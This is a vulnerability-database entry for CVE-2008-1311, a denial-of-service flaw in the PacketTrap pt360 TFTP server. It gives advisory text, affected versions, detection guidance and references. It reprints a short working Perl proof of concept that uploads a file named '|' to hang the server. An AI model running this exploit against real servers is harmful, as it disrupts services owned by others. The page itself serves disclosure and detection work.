CVE-2008-1311
published 2008-03-12CVE-2008-1311: The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and earlier allows remote attackers to cause a denial of service (daemon hang) by uploading a…
PriorityP336medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
49.17%
98.7th percentile
The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and earlier allows remote attackers to cause a denial of service (daemon hang) by uploading a file named (1) '|' (pipe), (2) '"' (quotation mark), or (3) "<>" (less than, greater than); or (4) a file with a long name. NOTE: the issue for vector 4 might exist because of an incomplete fix for CVE-2008-1312.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| packettrap | pt360_tool_suite | — | — |
| packettrap | pt360_tool_suite_pro | <= 2.0.3901.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor TFTP WRQ (write request) packets containing special characters in the filename field: pipe '|', double-quote '"', or angle brackets '<>' — any of these sent to a PacketTrap TFTP server will trigger a daemon hang. ↗
- →Detect TFTP WRQ packets with abnormally long filenames, which may indicate exploitation of the long-name DoS vector (related to incomplete fix for CVE-2008-1312). ↗
- →The exploit uses Net::TFTP in ASCII mode to PUT a file with a malicious name (e.g. '|') to the target; detect TFTP write requests in netflow/packet capture where the filename field contains shell metacharacters. ↗
- →A Metasploit auxiliary module exists for this vulnerability targeting PacketTrap TFTP Server 2.2.5459.0; presence of this module's traffic pattern (TFTP WRQ with special filename) should be flagged. ↗
- ·The IP address 192.168.0.112 in the PoC exploit is a hardcoded private/lab address used by the researcher and is NOT an attacker-controlled infrastructure indicator — it represents the target in the test environment. ↗
- ·The long-filename DoS vector (vector 4) may persist even on patched versions of pt360 due to an incomplete fix; verify patch completeness against both CVE-2008-1311 and CVE-2008-1312. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wh4r-h2m3-5vj2: Unspecified vulnerability in the TFTP server in PacketTrap Networks pt360 Tool Suite 1
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2008-1312 [MEDIUM] GHSA-wh4r-h2m3-5vj2: Unspecified vulnerability in the TFTP server in PacketTrap Networks pt360 Tool Suite 1
Unspecified vulnerability in the TFTP server in PacketTrap Networks pt360 Tool Suite 1.1.33.1.0, and other versions before 2.0.3900.0, allows remote attackers to cause a denial of service (daemon crash) via a long TFTP packet, a different vulnerability than CVE-2008-1311.
GHSA
GHSA-vp84-pv39-f5x5: The TFTP server in PacketTrap pt360 Tool Suite PRO 2
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2008-1311 [MEDIUM] CWE-20 GHSA-vp84-pv39-f5x5: The TFTP server in PacketTrap pt360 Tool Suite PRO 2
The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and earlier allows remote attackers to cause a denial of service (daemon hang) by uploading a file named (1) '|' (pipe), (2) '"' (quotation mark), or (3) "<>" (less than, greater than); or (4) a file with a long name. NOTE: the issue for vector 4 might exist because of an incomplete fix for CVE-2008-1312.
No detection rules found.
Exploit-DB
PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service
exploitdb·2008-10-29
CVE-2008-1311 PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service
PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service
---
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com
# Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;)
# A product of tftpfuzz.pl (coming soon)
use Net::TFTP;
use Getopt::Std;
$tftp = Net::TFTP->new("192.168.0.112");
$tftp->ascii;
$tftp->put("test", "|");
exit;
# milw0rm.com [2008-10-29]
Metasploit
PacketTrap TFTP Server 2.2.5459.0 DoS
metasploit
PacketTrap TFTP Server 2.2.5459.0 DoS
PacketTrap TFTP Server 2.2.5459.0 DoS
The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request.
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/packettrash-adv.txthttp://aluigi.org/testz/tftpx.ziphttp://secunia.com/advisories/29308http://securityreason.com/securityalert/3734http://www.securityfocus.com/archive/1/489355/100/0/threadedhttp://www.securityfocus.com/bid/28187http://www.vupen.com/english/advisories/2008/0811/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41073http://aluigi.altervista.org/adv/packettrash-adv.txthttp://aluigi.org/testz/tftpx.ziphttp://secunia.com/advisories/29308http://securityreason.com/securityalert/3734http://www.securityfocus.com/archive/1/489355/100/0/threadedhttp://www.securityfocus.com/bid/28187http://www.vupen.com/english/advisories/2008/0811/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41073
2008-03-12
Published